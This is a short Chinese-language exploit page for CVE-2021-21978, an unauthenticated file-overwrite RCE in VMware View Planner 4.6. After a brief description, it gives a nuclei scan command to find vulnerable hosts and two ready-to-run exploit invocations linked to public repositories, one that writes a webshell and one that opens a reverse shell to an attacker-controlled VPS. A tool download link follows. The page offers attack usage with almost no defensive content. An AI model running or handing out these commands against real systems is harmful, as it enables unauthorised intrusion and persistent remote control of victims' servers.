## 漏洞概述
VMware View Planner Web管理界面存在一个上传日志功能文件的入口,没有进行认证且写入的日志文件路径用户可控,通过覆盖上传日志功能文件`log_upload_wsgi.py`,即可实现RCE
## 影响范围
“`http
VMware View Planner 4.6
“`
## POC
“`bash
nuclei -tags vmware -t cves/ -l urls.txt
Goby
“`
## EXP
1、写webshell [@skytina](https://github.com/skytina/CVE-2021-21978)
“`bash
python CVE-2021-21978.py https://192.168.80.3
“`
2、反弹shell [@me1ons](https://github.com/me1ons/CVE-2021-21978)
“`bash
python re-shell.py -u 目标IP -v VPS-IP -p 1234
“`
[点我下载](/Gr33kLibrary/download_tool/90/)
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
请登录后查看评论内容